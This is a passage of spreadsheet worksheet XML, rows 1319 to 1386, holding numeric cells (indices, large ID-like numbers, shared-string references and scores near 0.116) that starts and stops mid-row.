      <c r="A1319" s="1">
        <v>9708.0</v>
      </c>
      <c r="B1319" s="2">
        <v>5.6384828E7</v>
      </c>
      <c r="C1319" s="2" t="s">
        <v>1192</v>
      </c>
      <c r="D1319" s="2">
        <v>1.0</v>
      </c>
      <c r="E1319" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1319" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1320" ht="15.75" customHeight="1">
      <c r="A1320" s="1">
        <v>13825.0</v>
      </c>
      <c r="B1320" s="2">
        <v>3.6768724E7</v>
      </c>
      <c r="C1320" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="D1320" s="2">
        <v>1.0</v>
      </c>
      <c r="E1320" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1320" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1321" ht="15.75" customHeight="1">
      <c r="A1321" s="1">
        <v>13958.0</v>
      </c>
      <c r="B1321" s="2">
        <v>3.7298978E7</v>
      </c>
      <c r="C1321" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="D1321" s="2">
        <v>1.0</v>
      </c>
      <c r="E1321" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1321" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1322" ht="15.75" customHeight="1">
      <c r="A1322" s="1">
        <v>19687.0</v>
      </c>
      <c r="B1322" s="2">
        <v>5.6468448E7</v>
      </c>
      <c r="C1322" s="2" t="s">
        <v>1195</v>
      </c>
      <c r="D1322" s="2">
        <v>1.0</v>
      </c>
      <c r="E1322" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1322" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1323" ht="15.75" customHeight="1">
      <c r="A1323" s="1">
        <v>21936.0</v>
      </c>
      <c r="B1323" s="2">
        <v>2.8664562E7</v>
      </c>
      <c r="C1323" s="2" t="s">
        <v>1196</v>
      </c>
      <c r="D1323" s="2">
        <v>1.0</v>
      </c>
      <c r="E1323" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1323" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1324" ht="15.75" customHeight="1">
      <c r="A1324" s="1">
        <v>22281.0</v>
      </c>
      <c r="B1324" s="2">
        <v>3.3309458E7</v>
      </c>
      <c r="C1324" s="2" t="s">
        <v>1197</v>
      </c>
      <c r="D1324" s="2">
        <v>1.0</v>
      </c>
      <c r="E1324" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1324" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1325" ht="15.75" customHeight="1">
      <c r="A1325" s="1">
        <v>23193.0</v>
      </c>
      <c r="B1325" s="2">
        <v>5.2408415E7</v>
      </c>
      <c r="C1325" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="D1325" s="2">
        <v>1.0</v>
      </c>
      <c r="E1325" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1325" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1326" ht="15.75" customHeight="1">
      <c r="A1326" s="1">
        <v>23745.0</v>
      </c>
      <c r="B1326" s="2">
        <v>7385897.0</v>
      </c>
      <c r="C1326" s="2" t="s">
        <v>1199</v>
      </c>
      <c r="D1326" s="2">
        <v>1.0</v>
      </c>
      <c r="E1326" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1326" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1327" ht="15.75" customHeight="1">
      <c r="A1327" s="1">
        <v>23840.0</v>
      </c>
      <c r="B1327" s="2">
        <v>8124061.0</v>
      </c>
      <c r="C1327" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="D1327" s="2">
        <v>1.0</v>
      </c>
      <c r="E1327" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1327" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1328" ht="15.75" customHeight="1">
      <c r="A1328" s="1">
        <v>24501.0</v>
      </c>
      <c r="B1328" s="2">
        <v>1.1091709E7</v>
      </c>
      <c r="C1328" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="D1328" s="2">
        <v>1.0</v>
      </c>
      <c r="E1328" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1328" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1329" ht="15.75" customHeight="1">
      <c r="A1329" s="1">
        <v>24918.0</v>
      </c>
      <c r="B1329" s="2">
        <v>1.2370126E7</v>
      </c>
      <c r="C1329" s="2" t="s">
        <v>1202</v>
      </c>
      <c r="D1329" s="2">
        <v>1.0</v>
      </c>
      <c r="E1329" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1329" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1330" ht="15.75" customHeight="1">
      <c r="A1330" s="1">
        <v>25271.0</v>
      </c>
      <c r="B1330" s="2">
        <v>1.3394859E7</v>
      </c>
      <c r="C1330" s="2" t="s">
        <v>1203</v>
      </c>
      <c r="D1330" s="2">
        <v>1.0</v>
      </c>
      <c r="E1330" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1330" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1331" ht="15.75" customHeight="1">
      <c r="A1331" s="1">
        <v>25287.0</v>
      </c>
      <c r="B1331" s="2">
        <v>1.3400128E7</v>
      </c>
      <c r="C1331" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="D1331" s="2">
        <v>1.0</v>
      </c>
      <c r="E1331" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1331" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1332" ht="15.75" customHeight="1">
      <c r="A1332" s="1">
        <v>27192.0</v>
      </c>
      <c r="B1332" s="2">
        <v>2.0902385E7</v>
      </c>
      <c r="C1332" s="2" t="s">
        <v>1205</v>
      </c>
      <c r="D1332" s="2">
        <v>1.0</v>
      </c>
      <c r="E1332" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1332" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1333" ht="15.75" customHeight="1">
      <c r="A1333" s="1">
        <v>28809.0</v>
      </c>
      <c r="B1333" s="2">
        <v>2.8664561E7</v>
      </c>
      <c r="C1333" s="2" t="s">
        <v>1196</v>
      </c>
      <c r="D1333" s="2">
        <v>1.0</v>
      </c>
      <c r="E1333" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1333" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1334" ht="15.75" customHeight="1">
      <c r="A1334" s="1">
        <v>29134.0</v>
      </c>
      <c r="B1334" s="2">
        <v>3.0534747E7</v>
      </c>
      <c r="C1334" s="2" t="s">
        <v>1206</v>
      </c>
      <c r="D1334" s="2">
        <v>1.0</v>
      </c>
      <c r="E1334" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1334" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1335" ht="15.75" customHeight="1">
      <c r="A1335" s="1">
        <v>29572.0</v>
      </c>
      <c r="B1335" s="2">
        <v>3.3309457E7</v>
      </c>
      <c r="C1335" s="2" t="s">
        <v>1197</v>
      </c>
      <c r="D1335" s="2">
        <v>1.0</v>
      </c>
      <c r="E1335" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1335" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1336" ht="15.75" customHeight="1">
      <c r="A1336" s="1">
        <v>32924.0</v>
      </c>
      <c r="B1336" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C1336" s="2" t="s">
        <v>1207</v>
      </c>
      <c r="D1336" s="2">
        <v>1.0</v>
      </c>
      <c r="E1336" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1336" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1337" ht="15.75" customHeight="1">
      <c r="A1337" s="1">
        <v>32946.0</v>
      </c>
      <c r="B1337" s="2">
        <v>6473431.0</v>
      </c>
      <c r="C1337" s="2" t="s">
        <v>1208</v>
      </c>
      <c r="D1337" s="2">
        <v>1.0</v>
      </c>
      <c r="E1337" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1337" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1338" ht="15.75" customHeight="1">
      <c r="A1338" s="1">
        <v>33610.0</v>
      </c>
      <c r="B1338" s="2">
        <v>8342153.0</v>
      </c>
      <c r="C1338" s="2" t="s">
        <v>1209</v>
      </c>
      <c r="D1338" s="2">
        <v>1.0</v>
      </c>
      <c r="E1338" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1338" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="1339" ht="15.75" customHeight="1">
      <c r="A1339" s="1">
        <v>20975.0</v>
      </c>
      <c r="B1339" s="2">
        <v>1.6861718E7</v>
      </c>
      <c r="C1339" s="2" t="s">
        <v>1210</v>
      </c>
      <c r="D1339" s="2">
        <v>1.0</v>
      </c>
      <c r="E1339" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1339" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="1340" ht="15.75" customHeight="1">
      <c r="A1340" s="1">
        <v>32664.0</v>
      </c>
      <c r="B1340" s="2">
        <v>5914198.0</v>
      </c>
      <c r="C1340" s="2" t="s">
        <v>1211</v>
      </c>
      <c r="D1340" s="2">
        <v>1.0</v>
      </c>
      <c r="E1340" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1340" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="1341" ht="15.75" customHeight="1">
      <c r="A1341" s="1">
        <v>21638.0</v>
      </c>
      <c r="B1341" s="2">
        <v>2.4719186E7</v>
      </c>
      <c r="C1341" s="2" t="s">
        <v>1212</v>
      </c>
      <c r="D1341" s="2">
        <v>1.0</v>
      </c>
      <c r="E1341" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1341" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="1342" ht="15.75" customHeight="1">
      <c r="A1342" s="1">
        <v>32561.0</v>
      </c>
      <c r="B1342" s="2">
        <v>5769083.0</v>
      </c>
      <c r="C1342" s="2" t="s">
        <v>1213</v>
      </c>
      <c r="D1342" s="2">
        <v>1.0</v>
      </c>
      <c r="E1342" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1342" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="1343" ht="15.75" customHeight="1">
      <c r="A1343" s="1">
        <v>542.0</v>
      </c>
      <c r="B1343" s="2">
        <v>1.8727367E7</v>
      </c>
      <c r="C1343" s="2" t="s">
        <v>1214</v>
      </c>
      <c r="D1343" s="2">
        <v>1.0</v>
      </c>
      <c r="E1343" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1343" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1344" ht="15.75" customHeight="1">
      <c r="A1344" s="1">
        <v>1316.0</v>
      </c>
      <c r="B1344" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C1344" s="2" t="s">
        <v>1215</v>
      </c>
      <c r="D1344" s="2">
        <v>1.0</v>
      </c>
      <c r="E1344" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1344" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1345" ht="15.75" customHeight="1">
      <c r="A1345" s="1">
        <v>1856.0</v>
      </c>
      <c r="B1345" s="2">
        <v>2.9493043E7</v>
      </c>
      <c r="C1345" s="2" t="s">
        <v>1216</v>
      </c>
      <c r="D1345" s="2">
        <v>1.0</v>
      </c>
      <c r="E1345" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1345" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1346" ht="15.75" customHeight="1">
      <c r="A1346" s="1">
        <v>2778.0</v>
      </c>
      <c r="B1346" s="2">
        <v>3.5182635E7</v>
      </c>
      <c r="C1346" s="2" t="s">
        <v>1217</v>
      </c>
      <c r="D1346" s="2">
        <v>1.0</v>
      </c>
      <c r="E1346" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1346" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1347" ht="15.75" customHeight="1">
      <c r="A1347" s="1">
        <v>4936.0</v>
      </c>
      <c r="B1347" s="2">
        <v>4.4004467E7</v>
      </c>
      <c r="C1347" s="2" t="s">
        <v>1218</v>
      </c>
      <c r="D1347" s="2">
        <v>1.0</v>
      </c>
      <c r="E1347" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1347" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1348" ht="15.75" customHeight="1">
      <c r="A1348" s="1">
        <v>5808.0</v>
      </c>
      <c r="B1348" s="2">
        <v>4.6791727E7</v>
      </c>
      <c r="C1348" s="2" t="s">
        <v>1219</v>
      </c>
      <c r="D1348" s="2">
        <v>1.0</v>
      </c>
      <c r="E1348" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1348" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1349" ht="15.75" customHeight="1">
      <c r="A1349" s="1">
        <v>6144.0</v>
      </c>
      <c r="B1349" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C1349" s="2" t="s">
        <v>1220</v>
      </c>
      <c r="D1349" s="2">
        <v>1.0</v>
      </c>
      <c r="E1349" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1349" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1350" ht="15.75" customHeight="1">
      <c r="A1350" s="1">
        <v>7150.0</v>
      </c>
      <c r="B1350" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C1350" s="2" t="s">
        <v>1221</v>
      </c>
      <c r="D1350" s="2">
        <v>1.0</v>
      </c>
      <c r="E1350" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1350" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1351" ht="15.75" customHeight="1">
      <c r="A1351" s="1">
        <v>8048.0</v>
      </c>
      <c r="B1351" s="2">
        <v>5.2851682E7</v>
      </c>
      <c r="C1351" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="D1351" s="2">
        <v>1.0</v>
      </c>
      <c r="E1351" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1351" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1352" ht="15.75" customHeight="1">
      <c r="A1352" s="1">
        <v>8738.0</v>
      </c>
      <c r="B1352" s="2">
        <v>5.4529441E7</v>
      </c>
      <c r="C1352" s="2" t="s">
        <v>1223</v>
      </c>
      <c r="D1352" s="2">
        <v>1.0</v>
      </c>
      <c r="E1352" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1352" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1353" ht="15.75" customHeight="1">
      <c r="A1353" s="1">
        <v>10494.0</v>
      </c>
      <c r="B1353" s="2">
        <v>1.1276264E7</v>
      </c>
      <c r="C1353" s="2" t="s">
        <v>1224</v>
      </c>
      <c r="D1353" s="2">
        <v>1.0</v>
      </c>
      <c r="E1353" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1353" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1354" ht="15.75" customHeight="1">
      <c r="A1354" s="1">
        <v>10809.0</v>
      </c>
      <c r="B1354" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C1354" s="2" t="s">
        <v>1225</v>
      </c>
      <c r="D1354" s="2">
        <v>1.0</v>
      </c>
      <c r="E1354" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1354" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1355" ht="15.75" customHeight="1">
      <c r="A1355" s="1">
        <v>11800.0</v>
      </c>
      <c r="B1355" s="2">
        <v>2.4418365E7</v>
      </c>
      <c r="C1355" s="2" t="s">
        <v>1226</v>
      </c>
      <c r="D1355" s="2">
        <v>1.0</v>
      </c>
      <c r="E1355" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1355" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1356" ht="15.75" customHeight="1">
      <c r="A1356" s="1">
        <v>13718.0</v>
      </c>
      <c r="B1356" s="2">
        <v>3.6323839E7</v>
      </c>
      <c r="C1356" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="D1356" s="2">
        <v>1.0</v>
      </c>
      <c r="E1356" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1356" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1357" ht="15.75" customHeight="1">
      <c r="A1357" s="1">
        <v>14277.0</v>
      </c>
      <c r="B1357" s="2">
        <v>3.8443304E7</v>
      </c>
      <c r="C1357" s="2" t="s">
        <v>1228</v>
      </c>
      <c r="D1357" s="2">
        <v>1.0</v>
      </c>
      <c r="E1357" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1357" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1358" ht="15.75" customHeight="1">
      <c r="A1358" s="1">
        <v>15241.0</v>
      </c>
      <c r="B1358" s="2">
        <v>4.227146E7</v>
      </c>
      <c r="C1358" s="2" t="s">
        <v>1229</v>
      </c>
      <c r="D1358" s="2">
        <v>1.0</v>
      </c>
      <c r="E1358" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1358" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1359" ht="15.75" customHeight="1">
      <c r="A1359" s="1">
        <v>16319.0</v>
      </c>
      <c r="B1359" s="2">
        <v>4.5983691E7</v>
      </c>
      <c r="C1359" s="2" t="s">
        <v>1230</v>
      </c>
      <c r="D1359" s="2">
        <v>1.0</v>
      </c>
      <c r="E1359" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1359" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1360" ht="15.75" customHeight="1">
      <c r="A1360" s="1">
        <v>16383.0</v>
      </c>
      <c r="B1360" s="2">
        <v>4.6219711E7</v>
      </c>
      <c r="C1360" s="2" t="s">
        <v>1231</v>
      </c>
      <c r="D1360" s="2">
        <v>1.0</v>
      </c>
      <c r="E1360" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1360" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1361" ht="15.75" customHeight="1">
      <c r="A1361" s="1">
        <v>17237.0</v>
      </c>
      <c r="B1361" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C1361" s="2" t="s">
        <v>1232</v>
      </c>
      <c r="D1361" s="2">
        <v>1.0</v>
      </c>
      <c r="E1361" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1361" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1362" ht="15.75" customHeight="1">
      <c r="A1362" s="1">
        <v>18903.0</v>
      </c>
      <c r="B1362" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C1362" s="2" t="s">
        <v>1233</v>
      </c>
      <c r="D1362" s="2">
        <v>1.0</v>
      </c>
      <c r="E1362" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1362" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1363" ht="15.75" customHeight="1">
      <c r="A1363" s="1">
        <v>18943.0</v>
      </c>
      <c r="B1363" s="2">
        <v>5.4344522E7</v>
      </c>
      <c r="C1363" s="2" t="s">
        <v>1234</v>
      </c>
      <c r="D1363" s="2">
        <v>1.0</v>
      </c>
      <c r="E1363" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1363" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1364" ht="15.75" customHeight="1">
      <c r="A1364" s="1">
        <v>19564.0</v>
      </c>
      <c r="B1364" s="2">
        <v>5.6106253E7</v>
      </c>
      <c r="C1364" s="2" t="s">
        <v>1235</v>
      </c>
      <c r="D1364" s="2">
        <v>1.0</v>
      </c>
      <c r="E1364" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1364" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1365" ht="15.75" customHeight="1">
      <c r="A1365" s="1">
        <v>20972.0</v>
      </c>
      <c r="B1365" s="2">
        <v>1.6815736E7</v>
      </c>
      <c r="C1365" s="2" t="s">
        <v>1236</v>
      </c>
      <c r="D1365" s="2">
        <v>1.0</v>
      </c>
      <c r="E1365" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1365" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1366" ht="15.75" customHeight="1">
      <c r="A1366" s="1">
        <v>21099.0</v>
      </c>
      <c r="B1366" s="2">
        <v>1.8097866E7</v>
      </c>
      <c r="C1366" s="2" t="s">
        <v>1237</v>
      </c>
      <c r="D1366" s="2">
        <v>1.0</v>
      </c>
      <c r="E1366" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1366" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1367" ht="15.75" customHeight="1">
      <c r="A1367" s="1">
        <v>21186.0</v>
      </c>
      <c r="B1367" s="2">
        <v>1.9260025E7</v>
      </c>
      <c r="C1367" s="2" t="s">
        <v>1238</v>
      </c>
      <c r="D1367" s="2">
        <v>1.0</v>
      </c>
      <c r="E1367" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1367" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1368" ht="15.75" customHeight="1">
      <c r="A1368" s="1">
        <v>21297.0</v>
      </c>
      <c r="B1368" s="2">
        <v>2.0611985E7</v>
      </c>
      <c r="C1368" s="2" t="s">
        <v>1239</v>
      </c>
      <c r="D1368" s="2">
        <v>1.0</v>
      </c>
      <c r="E1368" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1368" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1369" ht="15.75" customHeight="1">
      <c r="A1369" s="1">
        <v>21299.0</v>
      </c>
      <c r="B1369" s="2">
        <v>2.0615422E7</v>
      </c>
      <c r="C1369" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="D1369" s="2">
        <v>1.0</v>
      </c>
      <c r="E1369" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1369" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1370" ht="15.75" customHeight="1">
      <c r="A1370" s="1">
        <v>21596.0</v>
      </c>
      <c r="B1370" s="2">
        <v>2.4034548E7</v>
      </c>
      <c r="C1370" s="2" t="s">
        <v>1241</v>
      </c>
      <c r="D1370" s="2">
        <v>1.0</v>
      </c>
      <c r="E1370" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1370" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1371" ht="15.75" customHeight="1">
      <c r="A1371" s="1">
        <v>21714.0</v>
      </c>
      <c r="B1371" s="2">
        <v>2.548306E7</v>
      </c>
      <c r="C1371" s="2" t="s">
        <v>1242</v>
      </c>
      <c r="D1371" s="2">
        <v>1.0</v>
      </c>
      <c r="E1371" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1371" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1372" ht="15.75" customHeight="1">
      <c r="A1372" s="1">
        <v>21766.0</v>
      </c>
      <c r="B1372" s="2">
        <v>2.6284241E7</v>
      </c>
      <c r="C1372" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="D1372" s="2">
        <v>1.0</v>
      </c>
      <c r="E1372" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1372" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1373" ht="15.75" customHeight="1">
      <c r="A1373" s="1">
        <v>21893.0</v>
      </c>
      <c r="B1373" s="2">
        <v>2.7814539E7</v>
      </c>
      <c r="C1373" s="2" t="s">
        <v>1244</v>
      </c>
      <c r="D1373" s="2">
        <v>1.0</v>
      </c>
      <c r="E1373" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1373" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1374" ht="15.75" customHeight="1">
      <c r="A1374" s="1">
        <v>22258.0</v>
      </c>
      <c r="B1374" s="2">
        <v>3.2837811E7</v>
      </c>
      <c r="C1374" s="2" t="s">
        <v>1245</v>
      </c>
      <c r="D1374" s="2">
        <v>1.0</v>
      </c>
      <c r="E1374" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1374" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1375" ht="15.75" customHeight="1">
      <c r="A1375" s="1">
        <v>22262.0</v>
      </c>
      <c r="B1375" s="2">
        <v>3.2943882E7</v>
      </c>
      <c r="C1375" s="2" t="s">
        <v>1246</v>
      </c>
      <c r="D1375" s="2">
        <v>1.0</v>
      </c>
      <c r="E1375" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1375" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1376" ht="15.75" customHeight="1">
      <c r="A1376" s="1">
        <v>22638.0</v>
      </c>
      <c r="B1376" s="2">
        <v>4.0641788E7</v>
      </c>
      <c r="C1376" s="2" t="s">
        <v>1247</v>
      </c>
      <c r="D1376" s="2">
        <v>1.0</v>
      </c>
      <c r="E1376" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1376" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1377" ht="15.75" customHeight="1">
      <c r="A1377" s="1">
        <v>22654.0</v>
      </c>
      <c r="B1377" s="2">
        <v>4.1140498E7</v>
      </c>
      <c r="C1377" s="2" t="s">
        <v>1248</v>
      </c>
      <c r="D1377" s="2">
        <v>1.0</v>
      </c>
      <c r="E1377" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1377" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1378" ht="15.75" customHeight="1">
      <c r="A1378" s="1">
        <v>22667.0</v>
      </c>
      <c r="B1378" s="2">
        <v>4.1359794E7</v>
      </c>
      <c r="C1378" s="2" t="s">
        <v>1249</v>
      </c>
      <c r="D1378" s="2">
        <v>1.0</v>
      </c>
      <c r="E1378" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1378" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1379" ht="15.75" customHeight="1">
      <c r="A1379" s="1">
        <v>22995.0</v>
      </c>
      <c r="B1379" s="2">
        <v>4951046.0</v>
      </c>
      <c r="C1379" s="2" t="s">
        <v>1250</v>
      </c>
      <c r="D1379" s="2">
        <v>1.0</v>
      </c>
      <c r="E1379" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1379" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1380" ht="15.75" customHeight="1">
      <c r="A1380" s="1">
        <v>23283.0</v>
      </c>
      <c r="B1380" s="2">
        <v>5.3738445E7</v>
      </c>
      <c r="C1380" s="2" t="s">
        <v>1251</v>
      </c>
      <c r="D1380" s="2">
        <v>1.0</v>
      </c>
      <c r="E1380" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1380" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1381" ht="15.75" customHeight="1">
      <c r="A1381" s="1">
        <v>23517.0</v>
      </c>
      <c r="B1381" s="2">
        <v>5840028.0</v>
      </c>
      <c r="C1381" s="2" t="s">
        <v>1252</v>
      </c>
      <c r="D1381" s="2">
        <v>1.0</v>
      </c>
      <c r="E1381" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1381" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1382" ht="15.75" customHeight="1">
      <c r="A1382" s="1">
        <v>23871.0</v>
      </c>
      <c r="B1382" s="2">
        <v>8343260.0</v>
      </c>
      <c r="C1382" s="2" t="s">
        <v>1253</v>
      </c>
      <c r="D1382" s="2">
        <v>1.0</v>
      </c>
      <c r="E1382" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1382" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1383" ht="15.75" customHeight="1">
      <c r="A1383" s="1">
        <v>25612.0</v>
      </c>
      <c r="B1383" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C1383" s="2" t="s">
        <v>1254</v>
      </c>
      <c r="D1383" s="2">
        <v>1.0</v>
      </c>
      <c r="E1383" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1383" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1384" ht="15.75" customHeight="1">
      <c r="A1384" s="1">
        <v>26130.0</v>
      </c>
      <c r="B1384" s="2">
        <v>1.593344E7</v>
      </c>
      <c r="C1384" s="2" t="s">
        <v>1255</v>
      </c>
      <c r="D1384" s="2">
        <v>1.0</v>
      </c>
      <c r="E1384" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1384" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1385" ht="15.75" customHeight="1">
      <c r="A1385" s="1">
        <v>26353.0</v>
      </c>
      <c r="B1385" s="2">
        <v>1.6815735E7</v>
      </c>
      <c r="C1385" s="2" t="s">
        <v>1236</v>
      </c>
      <c r="D1385" s="2">
        <v>1.0</v>
      </c>
      <c r="E1385" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1385" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1386" ht="15.75" customHeight="1">
      <c r="A1386" s="1">
        <v>26893.0</v>
      </c>
      <c r="B1386" s="2">
        <v>1.9260024E7</v>
      </c>
      <c r="C1386" s="2" t="s">
